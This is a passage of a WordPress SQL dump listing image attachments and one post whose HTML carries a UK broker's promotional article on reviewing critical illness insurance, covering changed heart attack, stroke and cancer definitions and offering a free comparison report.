16:37:52','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/global.jpg',0,'attachment','image/jpeg',0),(200,1,'2017-09-21 16:38:03','2017-09-21 16:38:03','','19th-july-9258156_xxl','','inherit','open','closed','','19th-july-9258156_xxl','','','2017-09-21 16:38:03','2017-09-21 16:38:03','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/19th-july-9258156_xxl.jpg',0,'attachment','image/jpeg',0),(201,1,'2017-09-21 16:38:11','2017-09-21 16:38:11','','courier1','','inherit','open','closed','','courier1','','','2017-09-21 16:38:11','2017-09-21 16:38:11','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/courier1.jpg',0,'attachment','image/jpeg',0),(202,1,'2017-09-21 16:38:19','2017-09-21 16:38:19','','396267_1475485004','','inherit','open','closed','','396267_1475485004','','','2017-09-21 16:38:19','2017-09-21 16:38:19','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/396267_1475485004.png',0,'attachment','image/png',0),(203,1,'2017-09-21 16:38:22','2017-09-21 16:38:22','','slider1','','inherit','open','closed','','slider1','','','2017-09-21 16:38:22','2017-09-21 16:38:22','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/slider1.jpg',0,'attachment','image/jpeg',0),(204,1,'2017-09-21 16:38:25','2017-09-21 16:38:25','','Map_of_stores_owned_by_Albertson\'s_in_the_United_States.svg','','inherit','open','closed','','map_of_stores_owned_by_albertsons_in_the_united_states-svg','','','2017-09-21 16:38:25','2017-09-21 16:38:25','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/Map_of_stores_owned_by_Albertsons_in_the_United_States.svg_.png',0,'attachment','image/png',0),(205,1,'2017-09-21 16:38:30','2017-09-21 16:38:30','','HANJIN_container','','inherit','open','closed','','hanjin_container','','','2017-09-21 16:38:30','2017-09-21 16:38:30','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/HANJIN_container.jpeg',0,'attachment','image/jpeg',0),(206,1,'2017-09-21 16:38:34','2017-09-21 16:38:34','','1280px-Postal_codes_by_country.svg','','inherit','open','closed','','1280px-postal_codes_by_country-svg','','','2017-09-21 16:38:34','2017-09-21 16:38:34','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/1280px-Postal_codes_by_country.svg_.png',0,'attachment','image/png',0),(207,1,'2017-09-21 16:38:36','2017-09-21 16:38:36','','index','','inherit','open','closed','','index','','','2017-09-21 16:38:36','2017-09-21 16:38:36','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/index.jpg',0,'attachment','image/jpeg',0),(208,1,'2017-09-21 16:38:40','2017-09-21 16:38:40','','volunteer-1326758_960_720','','inherit','open','closed','','volunteer-1326758_960_720','','','2017-09-21 16:38:40','2017-09-21 16:38:40','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/volunteer-1326758_960_720.png',0,'attachment','image/png',0),(209,1,'2017-09-21 16:38:45','2017-09-21 16:38:45','','863652975','','inherit','open','closed','','863652975','','','2017-09-21 16:38:45','2017-09-21 16:38:45','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/863652975.jpg',0,'attachment','image/jpeg',0),(210,1,'2017-09-21 16:38:48','2017-09-21 16:38:48','','river-thames-1415922_960_720','','inherit','open','closed','','river-thames-1415922_960_720','','','2017-09-21 16:38:48','2017-09-21 16:38:48','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/river-thames-1415922_960_720.jpg',0,'attachment','image/jpeg',0),(211,1,'2017-09-21 16:38:54','2017-09-21 16:38:54','','Citan-109-CDI-Sprinter-313-CDI-MK-London-Link-3','','inherit','open','closed','','citan-109-cdi-sprinter-313-cdi-mk-london-link-3','','','2017-09-21 16:38:54','2017-09-21 16:38:54','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/Citan-109-CDI-Sprinter-313-CDI-MK-London-Link-3.jpg',0,'attachment','image/jpeg',0),(212,1,'2017-09-21 16:38:58','2017-09-21 16:38:58','','GoogleMaps','','inherit','open','closed','','googlemaps','','','2017-09-21 16:38:58','2017-09-21 16:38:58','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/GoogleMaps.jpg',0,'attachment','image/jpeg',0),(213,1,'2017-09-21 16:39:01','2017-09-21 16:39:01','','PTSD_CPTSD_ICD11','','inherit','open','closed','','ptsd_cptsd_icd11','','','2017-09-21 16:39:01','2017-09-21 16:39:01','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/PTSD_CPTSD_ICD11.jpg',0,'attachment','image/jpeg',0),(214,1,'2017-09-21 16:39:07','2017-09-21 16:39:07','','file000132701536','','inherit','open','closed','','file000132701536','','','2017-09-21 16:39:07','2017-09-21 16:39:07','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/file000132701536.jpg',0,'attachment','image/jpeg',0),(215,1,'2017-09-21 16:39:09','2017-09-21 16:39:09','','file3251255366828','','inherit','open','closed','','file3251255366828','','','2017-09-21 17:24:23','2017-09-21 17:24:23','',65,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/file3251255366828.jpg',0,'attachment','image/jpeg',0),(216,1,'2017-09-21 16:39:21','2017-09-21 16:39:21','','file0001966720664','','inherit','open','closed','','file0001966720664','','','2017-09-21 16:39:21','2017-09-21 16:39:21','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/file0001966720664.jpg',0,'attachment','image/jpeg',0),(217,1,'2017-09-21 16:39:54','2017-09-21 16:39:54','','file5001258630705','','inherit','open','closed','','file5001258630705','','','2017-09-21 16:39:54','2017-09-21 16:39:54','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/file5001258630705.jpg',0,'attachment','image/jpeg',0),(218,1,'2017-09-21 16:40:02','2017-09-21 16:40:02','','file00053809264','','inherit','open','closed','','file00053809264','','','2017-09-21 16:40:02','2017-09-21 16:40:02','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/file00053809264.jpg',0,'attachment','image/jpeg',0),(219,1,'2017-09-21 16:40:20','2017-09-21 16:40:20','','file2961342149502','','inherit','open','closed','','file2961342149502','','','2017-09-21 16:40:20','2017-09-21 16:40:20','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/file2961342149502.jpg',0,'attachment','image/jpeg',0),(222,1,'2017-09-21 16:45:29','2017-09-21 16:45:29','','alkoghol-2714482_1280','','inherit','open','closed','','alkoghol-2714482_1280','','','2017-09-21 16:45:29','2017-09-21 16:45:29','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/alkoghol-2714482_1280.jpg',0,'attachment','image/jpeg',0),(223,1,'2017-09-21 16:45:32','2017-09-21 16:45:32','','alkoghol-2714488_1280','','inherit','open','closed','','alkoghol-2714488_1280','','','2017-09-21 16:45:32','2017-09-21 16:45:32','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/alkoghol-2714488_1280.jpg',0,'attachment','image/jpeg',0),(224,1,'2017-09-21 16:45:35','2017-09-21 16:45:35','','anti-drugs-2353346_1280','','inherit','open','closed','','anti-drugs-2353346_1280','','','2017-09-21 16:45:35','2017-09-21 16:45:35','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/anti-drugs-2353346_1280.png',0,'attachment','image/png',0),(225,1,'2017-09-21 16:45:39','2017-09-21 16:45:39','','bank-20795_1280','','inherit','open','closed','','bank-20795_1280','','','2017-09-21 16:45:39','2017-09-21 16:45:39','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/bank-20795_1280.jpg',0,'attachment','image/jpeg',0),(226,1,'2017-09-21 16:45:42','2017-09-21 16:45:42','','banknote-15801_1280','','inherit','open','closed','','banknote-15801_1280','','','2017-09-21 16:45:42','2017-09-21 16:45:42','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/banknote-15801_1280.jpg',0,'attachment','image/jpeg',0),(227,1,'2017-09-21 16:45:45','2017-09-21 16:45:45','','business-18107_1280','','inherit','open','closed','','business-18107_1280','','','2017-09-21 16:45:45','2017-09-21 16:45:45','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/business-18107_1280.jpg',0,'attachment','image/jpeg',0),(228,1,'2017-09-21 16:45:48','2017-09-21 16:45:48','','coins-1523383_1280','','inherit','open','closed','','coins-1523383_1280','','','2017-09-21 17:15:27','2017-09-21 17:15:27','',120,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/coins-1523383_1280.jpg',0,'attachment','image/jpeg',0),(229,1,'2017-09-21 16:45:51','2017-09-21 16:45:51','','drugs-206150_1280','','inherit','open','closed','','drugs-206150_1280','','','2017-09-21 16:45:51','2017-09-21 16:45:51','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/drugs-206150_1280.jpg',0,'attachment','image/jpeg',0),(230,1,'2017-09-21 16:45:54','2017-09-21 16:45:54','','moremoney','','inherit','open','closed','','moremoney','','','2017-10-12 11:15:01','2017-10-12 11:15:01','',115,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/moremoney.jpg',0,'attachment','image/jpeg',0),(231,1,'2017-09-21 16:45:57','2017-09-21 16:45:57','','Sea Fun Seaside Family Summer Beach Mother','Sea Fun Seaside Family Summer Beach Mother','inherit','open','closed','','sea-fun-seaside-family-summer-beach-mother','','','2017-09-21 16:45:57','2017-09-21 16:45:57','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/norfolk.jpg',0,'attachment','image/jpeg',0),(232,1,'2017-09-21 16:46:03','2017-09-21 16:46:03','','pound-414418_1280','','inherit','open','closed','','pound-414418_1280','','','2017-09-21 16:46:03','2017-09-21 16:46:03','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/pound-414418_1280.jpg',0,'attachment','image/jpeg',0),(233,1,'2017-09-21 16:46:08','2017-09-21 16:46:08','','s','','inherit','open','closed','','s','','','2017-09-21 16:46:08','2017-09-21 16:46:08','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/s.jpg',0,'attachment','image/jpeg',0),(234,1,'2017-09-21 16:46:11','2017-09-21 16:46:11','','glasses-272399_1280','','inherit','open','closed','','glasses-272399_1280','','','2017-09-21 17:16:17','2017-09-21 17:16:17','',120,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/glasses-272399_1280.jpg',0,'attachment','image/jpeg',0),(235,1,'2017-09-21 16:46:15','2017-09-21 16:46:15','','LAW','','inherit','open','closed','','law','','','2017-09-21 16:46:15','2017-09-21 16:46:15','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/LAW.jpg',0,'attachment','image/jpeg',0),(236,1,'2017-09-21 16:46:22','2017-09-21 16:46:22','','computer-keyboard','','inherit','open','closed','','computer-keyboard','','','2017-09-21 16:46:22','2017-09-21 16:46:22','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/computer-keyboard.jpg',0,'attachment','image/jpeg',0),(237,1,'2017-09-21 16:46:30','2017-09-21 16:46:30','','computer-on-desk','','inherit','open','closed','','computer-on-desk','','','2017-09-21 16:46:30','2017-09-21 16:46:30','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/computer-on-desk.jpg',0,'attachment','image/jpeg',0),(238,1,'2017-09-21 16:46:37','2017-09-21 16:46:37','','computer-on-desk-2','','inherit','open','closed','','computer-on-desk-2','','','2017-09-21 16:46:37','2017-09-21 16:46:37','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/computer-on-desk-2.jpg',0,'attachment','image/jpeg',0),(239,1,'2017-09-21 16:46:44','2017-09-21 16:46:44','','computer-on-desk-3','','inherit','open','closed','','computer-on-desk-3','','','2017-09-21 16:46:44','2017-09-21 16:46:44','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/computer-on-desk-3.jpg',0,'attachment','image/jpeg',0),(240,1,'2017-09-21 16:46:53','2017-09-21 16:46:53','','computer-on-desk-4','','inherit','open','closed','','computer-on-desk-4','','','2017-09-21 16:46:53','2017-09-21 16:46:53','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/computer-on-desk-4.jpg',0,'attachment','image/jpeg',0),(241,1,'2017-09-21 16:46:56','2017-09-21 16:46:56','<body class=\"single single-post postid-7394 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"/></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										5 Powerful Reasons To Review Your Critical illness Insurance										</h1>&#13;\n				</div>&#13;\n</div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		<div id=\"content\" class=\"full-width\" style=\"width:100%\">&#13;\n										<div id=\"post-7394\" class=\"post-7394 post type-post status-publish format-standard has-post-thumbnail hentry category-insurance-protection post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">5 Powerful Reasons To Review Your Critical illness Insurance</span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"wpb_row vc_row-fluid\"> &#13;\n	<div class=\"vc_span3 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h5/>&#13;\n<h5/>&#13;\n<p>Fast Facts</p>&#13;\n<p>There is a <b>pressing need to for anyone</b> who has bought critical illness insurance from a <b><span style=\"text-decoration: underline;\">Bank, online or even with their financial adviser</span> </b>between<b> 2005 and 2011,</b>who has not had it reviewed recently to get it reviewed now</p>&#13;\n<p>#1: Heart Attacks<br/>&#13;\nImproved so you can claim on  minor heart attacks</p>&#13;\n<p><span style=\"line-height: 1.5em;\">#2: Strokes</span><br/><span style=\"line-height: 1.5em;\">Reduced the need for “</span>permanency<span style=\"line-height: 1.5em;\">” meaning quicker &amp; more claims paid</span></p>&#13;\n<p>#3: Cancer<br/>&#13;\nCovering more early stage cancer – which can only be good news for claimants</p>&#13;\n<p><span style=\"line-height: 1.5em;\"> #4: Partial Payments</span><br/><span style=\"line-height: 1.5em;\">Significant </span>improvements<span style=\"line-height: 1.5em;\"> being made on cover for the less serious illnesses</span><span style=\"line-height: 1.5em;\"> </span></p>&#13;\n<p> #5: 21st Century Comparison Report<br/>&#13;\nQuick and easy compare to find the best plan for you</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span9 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h1><b>5 POWERFUL REASONS TO REVIEW YOUR CRITICAL ILLNESS INSURANCE</b></h1>&#13;\n<p><span style=\"font-size: 1.17em; line-height: 1.5em;\">By : Strategic Development Director</span></p>&#13;\n<p/><div class=\"clearboth\"/><div class=\"demo-sep sep-single\" style=\"margin-top:20px;margin-bottom:20px;\"/>&#13;\n<p><b>Do you spend any time on the small print on your critical illness insurance cover?  In fact most people will take a quick look at the conditions and assume they are fully covered, before putting it away in a drawer.</b></p>&#13;\n<p>You might think that with critical illness cover the insurance company’s description of “critical” would always tally with the client’s definition.</p>&#13;\n<p>However that may not always the case, when it comes to meeting the plan wording at time of a claim.</p>&#13;\n<p>Let me explain…</p>&#13;\n<p><span style=\"font-size: 14px; line-height: 1.5em;\"> </span></p>&#13;\n<p>Why Does Critical Illness Insurance Need to Change</p>&#13;\n<p><span style=\"line-height: 1.5em;\">The world is a different place to what it once was, and it is changing day by day for all of us. Improvements in healthcare, diet and living conditions mean </span><b style=\"line-height: 1.5em;\">we are now living longer than ever before.</b></p>&#13;\n<p>Medical technology is advancing all the time. Tests and screenings are now much better at identifying less severe conditions. For example, doctors are now <b>able to detect less</b> severe heart attacks.</p>&#13;\n<p>At the same time, people are more aware of the risks to their health, <b>so they are going for screenings sooner</b>. This means certain conditions, such as cancer, are now being <b>diagnosed much earlier</b>, sometimes even before symptoms develop.</p>&#13;\n<p>So surely that’s a good thing, right? In the main – yes it is! It means we’re around longer to see our families grow and flourish, to make the most of life and to enjoy all that it has to offer.</p>&#13;\n<p>But it’s much more complex than that. By living longer, it means our lives are<b> no longer black </b><b>and white.</b> New complications are emerging. The 21st Century may bring new benefits, but it also brings new problems.</p>&#13;\n<p>That’s why some of the forms of critical illness covers drawn together in the 20th Century are no longer relevant to life today.</p>&#13;\n<p><b style=\"line-height: 1.5em;\">So what changed with CI Cover in 2017</b></p>&#13;\n<p/>&#13;\n<p>Last year was a year of tremendous change due to some insurers making improvements to the depth and breadth of their CI cover, making claiming on a plan much easier, which can only be good news for new consumers…</p>&#13;\n<p>… but what if you already have a plan?</p>&#13;\n<p>*It is estimated that of the 5 million critical illness plans in existence today over 50% plans can be upgraded to better levels of protection, with those who took out plans between 2005 and 2011 gaining most.</p>&#13;\n<p>Subject to cost and underwriting, this certainly corresponds to our own client reviews, which means:</p>&#13;\n<ul><li><span style=\"line-height: 1.5em;\">quicker and faster pay outs at time of claim.</span></li>&#13;\n<li>broader coverage so you can claim on more illnesses.</li>&#13;\n<li>less stress and hassle for claimants and their families.</li>&#13;\n</ul><p>That’s why there is a pressing need to for anyone who has bought critical illness insurance from a <span style=\"text-decoration: underline;\">Bank, online or even with their financial adviser</span> who has not had it reviewed in the few years to get it reviewed as soon as possible.</p>&#13;\n<h2 style=\"text-align: left;\"><span style=\"color: #993300;\"><b>Here’s my 5 powerful reasons to review your critical illness insurance in the hope that you don’t discover that the small print excludes your illness – because it is not serious enough.</b></span></h2>&#13;\n<p><span style=\"line-height: 1.5em;\"><div id=\"\" class=\"fullwidth-box\" style=\"background-color:#7f5e7b;background-image:url();background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-top:1px solid ;border-bottom:1px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <span style=\"color: #ffffff;\">Critical Change #1: Less Severe Heart Attacks Now Covered </span><span style=\"line-height: 1.5em;\"/></div></div></span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">There are around 103,000 heart attacks each year in the UK. Incidence increases markedly with age with:</span></p>&#13;\n<ul><li>men in the 25-44 age group suffering 300 per million and</li>&#13;\n<li>men in the 45-64 group 5,300 per million.</li>&#13;\n<li>men under age 50 are over four times more likely to suffer a heart attack than women.</li>&#13;\n</ul><p>Whats changed</p>&#13;\n<p>A number of insurers improved their policy definitions to make it easier for people to make a claim for a heart attack.</p>&#13;\n<p>Some have <b><span style=\"text-decoration: underline;\">removed the need</span></b> for troponin to reach a specific raised level for a claim to be successfully paid, and instead simply requiring enzyme levels to be raised for a paid claim, Some <b>even removed the need to rely on</b> enzyme levels altogether.</p>&#13;\n<p>Which means with some insurers you are 45% more likely to get a pay-out?</p>&#13;\n<p><span style=\"font-size: 1.17em; line-height: 1.5em;\"><div id=\"\" class=\"fullwidth-box\" style=\"background-color:#7f5e7b;background-image:url();background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-top:1px solid ;border-bottom:1px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <span style=\"color: #ffffff;\">Critical Change #2: New Plan Wording Will Help With Quicker Payments and Fewer Declines</span><span style=\"font-size: 1.17em; line-height: 1.5em;\"/></div></div></span></p>&#13;\n<div>&#13;\n<p>Each year of the 150,000 strokes in the UK about 110,000 suffer a first stroke, did you also know that:.</p>&#13;\n<ul><li>12,500 first stoke victims were under age 65.</li>&#13;\n<li>male to female ratio is 60:40.</li>&#13;\n<li><span style=\"line-height: 1.5em;\">between 20% &amp; 30% of sufferers will die within a month.</span></li>&#13;\n<li>the risk of a first stroke for smokers is 140% higher</li>&#13;\n<li>for Diabetes sufferers is 100% higher</li>&#13;\n</ul><p>Let’s go a bit deeper on the CI changes…</p>&#13;\n<p>Around <b>one in six stroke</b> sufferers will meet the <b>permanent neurological deficit requirement </b>required under the policy wording for a stroke.</p>&#13;\n<p>Stroke definitions were streamlined so that neurological damage <b>no longer needed to be permanent</b> in order to make a claim, instead taking into account symptoms extending beyond 24 hours with a positive brain scan.</p>&#13;\n<p>According to the Stroke Society a third of people who have a stroke make a significant recovery within a month. But most stroke survivors will have long-term problems. It may take a year or longer for them to make the best possible recovery.  – however a stroke does not always present permanent symptoms by removing the need for permanency…</p>&#13;\n<p>…we expect insurers to<b> pay even more claims</b>, with quicker payment and fewer declines.</p>&#13;\n</div>&#13;\n<p/><div id=\"\" class=\"fullwidth-box\" style=\"background-color:#7f5e7b;background-image:url();background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-top:1px solid ;border-bottom:1px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <span style=\"color: #ffffff;\">Critical Change #3: Significant Cancer Cover Improvements</span></div></div>&#13;\n<p>Cancer is not a single disease with a single type of treatment. There are more than <b>200 different kinds of cancer</b>, each with its own name and treatment.</p>&#13;\n<p>According to CI Expert cancer is the single most feared disease with 320,000 new diagnoses in the UK during 2011, ignoring non-melanoma skin cancers. Of these, 117,000 affected those below age 65 and over 60% of these affected females.</p>&#13;\n<p><span style=\"line-height: 1.5em;\">Unsurprisingly it is also the condition most likely to result in a claim and half of people diagnosed with cancer now survive their disease for at least five years.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">The main cancer definition has remained unchanged for many years but we have seen some insurers </span><b style=\"line-height: 1.5em;\">extend </b><span style=\"line-height: 1.5em;\">cover for:</span></p>&#13;\n<ul><li>chronic lymphocytic leukaemia</li>&#13;\n<li>skin cancer basal cell carcinoma</li>&#13;\n<li>squamous cell carcinoma</li>&#13;\n</ul><p><b>*Basal cell carcinoma</b> is a cancer of the basal cells, it accounts for <b>75% of all skin cancers</b> in the UK, while squamous cell carcinoma and accounts for about 20% according to evidence from National Institute for Health and Care Excellence (NICE).</p>&#13;\n<p>Early stage cancer – carcinoma in situ</p>&#13;\n<p>One insurer has updated its serious illness cover in relation to cancer payments. Typically insurers <b>only cover carcinoma in situ cancers</b>  with a partial payout– this is an early forms of cancer in specific parts of the body and <b>only</b> if the client has surgery or invasive treatment.</p>&#13;\n<p>The insurer moved to paying out a 5 per cent partial payment <b>on all forms of carcinoma in situ cancers regardless of where they are in the body</b>, and on some non-melanoma skin cancers.</p>&#13;\n<p>It also pays out <b>on diagnosis</b> of the <b>carcinoma in situ</b> cancer, rather than requiring evidence of treatment or surgery to make a claim.</p>&#13;\n<p>With cancer accounting for circa 65% of all insurer claims, again this can only be good news for claimants increasing what they can claim on.</p>&#13;\n<div id=\"\" class=\"fullwidth-box\" style=\"background-color:#7f5e7b;background-image:url();background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-top:1px solid ;border-bottom:1px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <span style=\"color: #ffffff;\">Critical Change #4:  More Partial Payments for Serious Illness</span> </div></div>&#13;\n<p><span style=\"line-height: 1.5em;\">Over the last few years we have seen the inclusion of partial payment conditions into CI plans. from the introduction of  children’s critical illness to more recent inclusions of mastectomy due to ductal carcinoma in situ and early stage prostate cancer, both that add great value to a plan.</span></p>&#13;\n<p>Although the  main focus has been on two conditions ,we  are now seeing an increase into other areas with some traditional CI insurers now adding up to 17 early stage pay-outs for less serious illnesses, covering  conditions like – coronary angioplasty: crohn’s disease and severe visual impairment.</p>&#13;\n<p>Only one insurer offers a full severity based plan with up to 166 conditions covered – that’s over 100 more than any other insurer.</p>&#13;\n<p>Breaking the cover down for you even further. Recent changes to full severity Illness Insurance now covers:</p>&#13;\n<ul><li>All types of heart attacks and strokes – including those that other insurers don’t</li>&#13;\n<li>More forms of cancer than any other insurer.</li>&#13;\n<li>Early stage forms of cancer upon diagnosis only – again, this is something that other insurers simply won’t do.</li>&#13;\n</ul><div id=\"\" class=\"fullwidth-box\" style=\"background-color:#7f5e7b;background-image:url();background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-top:1px solid ;border-bottom:1px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <span style=\"color: #ffffff;\">Critical Change #5: More Transparent Comparisons </span> </div></div>&#13;\n<p>Imagine if you could effortlessly compare all the competing critical illness cover plans in the market quickly and transparently without lifting a finger, so you get the plans with the highest statistical likely hood of paying out to you and your family with no:</p>&#13;\n<ul><li>personal judgement or bias</li>&#13;\n<li>insurer marketing hype</li>&#13;\n<li>sales pressure</li>&#13;\n</ul><p>Here is an example of our report when analysing a 2008  plan against one of the newer style plans – the first column shows that we lose no important conditions or plan wording and the second column all the areas that can be discussed and improved upon.</p>&#13;\n<p/>&#13;\n<p>Critical illness plans have evolved over the last few years. <b>How does your plan stack up – click the button below to see a sample full report</b></p>&#13;\n<p style=\"text-align: center;\"><a class=\"button-1 button large green\" title=\"\" href=\"http://www.reidscottross.co.uk/wp-content/uploads/2014/02/CI-Article-Comparison.pdf\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'download\',\'http://www.reidscottross.co.uk/wp-content/uploads/2014/02/CI-Article-Comparison.pdf\']);\" target=\"_self\">View Sample Report</a></p>&#13;\n<p/><div class=\"clearboth\"/><div class=\"demo-sep sep-single\" style=\"margin-top:20px;margin-bottom:20px;\"/>&#13;\n<p><span style=\"line-height: 1.5em; font-size: 14px;\">So as you can see, there’s a great deal of thought and effort that has gone into this to make sure that the client – the person that matters in all of this – comes first.</span></p>&#13;\n<p>I could have created a bigger list of improvements but kept to the ones that I feel have the biggest impact  and relevance to consumers. But it worth mentioning that improvements were made into areas like; children s CI cover; well-being support and claims ratios.</p>&#13;\n<p><b style=\"font-size: 14px; line-height: 1.5em;\">Next Steps</b></p>&#13;\n<p>Now I don’t know about you but arranging your critical illness insurance efficiently can make a significant difference to the scope and breadth of being able to make a successful claim and get the best value plan for your budget.</p>&#13;\n<p>I’m not going to say that I am the perfect person to arrange your critical illness insurance because that might be too pushy. What I will say is I am more than happy to provide you with a FREE comparison report so you see the difference for yourself.</p>&#13;\n<p>It couldn’t be simpler just click on the “Get Your Free Report” button to get started<span style=\"line-height: 1.5em;\"> and discover how our highly personalised approach to your family protection can make the difference you need.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">Warmest regards</span></p>&#13;\n<p>Sam<br/>&#13;\nEquity SMART</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid\"> &#13;\n	<div class=\"vc_span3 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span9 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-right, left, top or bottom-width:3px !important;border-right, left, top or bottom-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.reidscottross.co.uk/contact-us/\" target=\"\" class=\"continue button large default\">Get Your Report Today</a><h2>Get Your FREE CI Comparison Report</h2><p>You can improve your position, starting today - click the link</p><a href=\"../contact-us/\" target=\"\" class=\"continue mobile-button button large default\">Get Your Report Today</a></section></div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span>Categories: <a href=\"../category/insurance-protection/\" title=\"View all posts in Insurance Protection\" rel=\"category tag\">Insurance Protection</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../5-powerful-reasons-review-critical-illness-insurance/\" title=\"Comment on 5 Powerful Reasons To Review Your Critical illness Insurance\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.reidscottross.co.uk/5-powerful-reasons-review-critical-illness-insurance/&amp;p[title]=5%20Powerful%20Reasons%20To%20Review%20Your%20Critical%20illness%20Insurance\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div 